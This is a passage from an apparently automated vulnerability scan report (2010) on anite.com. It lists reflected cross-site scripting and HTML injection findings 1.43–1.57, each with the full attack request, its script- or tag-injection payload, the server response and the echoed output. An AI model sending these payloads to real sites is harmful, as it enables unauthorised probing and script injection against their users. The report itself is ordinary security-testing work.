Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-travel.html?Itemid=aa029"><a>65ab8abd865#up">
...[SNIP]...

1.43. http://anite.com/anite-travel.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-travel.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c02"><script>alert(1)</script>566738a2c7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /44c02"><script>alert(1)</script>566738a2c7e HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/44c02"><script>alert(1)</script>566738a2c7e#up">
...[SNIP]...

1.44. http://anite.com/anite-travel.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-travel.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f88"><a>8baabc9304b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-travel.html?e2f88"><a>8baabc9304b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-travel.html?e2f88"><a>8baabc9304b=1#up">
...[SNIP]...

1.45. http://anite.com/anite-wireless-10.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-wireless-10.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9e1f"><a>e26f6ebde78 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-wireless-10.html?Itemid=b9e1f"><a>e26f6ebde78 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-wireless-10.html?Itemid=b9e1f"><a>e26f6ebde78#up">
...[SNIP]...

1.46. http://anite.com/anite-wireless-10.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-wireless-10.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64460"><script>alert(1)</script>4b2edcf9a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64460"><script>alert(1)</script>4b2edcf9a7d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/64460"><script>alert(1)</script>4b2edcf9a7d#up">
...[SNIP]...

1.47. http://anite.com/anite-wireless-10.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-wireless-10.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c31b"><a>82874415103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-wireless-10.html?3c31b"><a>82874415103=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-wireless-10.html?3c31b"><a>82874415103=1#up">
...[SNIP]...

1.48. http://anite.com/anite-wireless-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-wireless-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559f4"><a>23901347b69 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-wireless-2.html?Itemid=559f4"><a>23901347b69 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-wireless-2.html?Itemid=559f4"><a>23901347b69#up">
...[SNIP]...

1.49. http://anite.com/anite-wireless-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-wireless-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b665f"><script>alert(1)</script>5aa278397d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b665f"><script>alert(1)</script>5aa278397d9 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b665f"><script>alert(1)</script>5aa278397d9#up">
...[SNIP]...

1.50. http://anite.com/anite-wireless-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-wireless-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ae8"><a>349e3dae902 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-wireless-2.html?a1ae8"><a>349e3dae902=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-wireless-2.html?a1ae8"><a>349e3dae902=1#up">
...[SNIP]...

1.51. http://anite.com/anites-leading-network-simulator-sas-makes.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anites-leading-network-simulator-sas-makes.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e824"><a>d06f68d038c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anites-leading-network-simulator-sas-makes.html?Itemid=2284e824"><a>d06f68d038c&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anites-leading-network-simulator-sas-makes.html?Itemid=2284e824"><a>d06f68d038c&nomore=true#up">
...[SNIP]...

1.52. http://anite.com/anites-leading-network-simulator-sas-makes.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anites-leading-network-simulator-sas-makes.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c841"><script>alert(1)</script>c1ce9b7b035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7c841"><script>alert(1)</script>c1ce9b7b035 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/7c841"><script>alert(1)</script>c1ce9b7b035#up">
...[SNIP]...

1.53. http://anite.com/anites-leading-network-simulator-sas-makes.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anites-leading-network-simulator-sas-makes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a41b"><a>25e06bd1e4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anites-leading-network-simulator-sas-makes.html?9a41b"><a>25e06bd1e4c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anites-leading-network-simulator-sas-makes.html?9a41b"><a>25e06bd1e4c=1#up">
...[SNIP]...

1.54. http://anite.com/atlantic-holidays-re-affirm-commitment-to-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/atlantic-holidays-re-affirm-commitment-to-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7504c"><a>08ed35b0bd2 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /atlantic-holidays-re-affirm-commitment-to-anite.html?Itemid=2647504c"><a>08ed35b0bd2&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/atlantic-holidays-re-affirm-commitment-to-anite.html?Itemid=2647504c"><a>08ed35b0bd2&nomore=true#up">
...[SNIP]...

1.55. http://anite.com/atlantic-holidays-re-affirm-commitment-to-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/atlantic-holidays-re-affirm-commitment-to-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5a43"><script>alert(1)</script>9e10425a12e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a5a43"><script>alert(1)</script>9e10425a12e HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/a5a43"><script>alert(1)</script>9e10425a12e#up">
...[SNIP]...

1.56. http://anite.com/atlantic-holidays-re-affirm-commitment-to-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/atlantic-holidays-re-affirm-commitment-to-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a85b4"><a>1425c7c8c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /atlantic-holidays-re-affirm-commitment-to-anite.html?a85b4"><a>1425c7c8c9a=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/atlantic-holidays-re-affirm-commitment-to-anite.html?a85b4"><a>1425c7c8c9a=1#up">
...[SNIP]...

1.57. http://anite.com/atom.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/atom.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16ad"><script>alert(1)</script>f9823fc564f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d16ad"><script>alert(1)</script>f9823fc564f HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
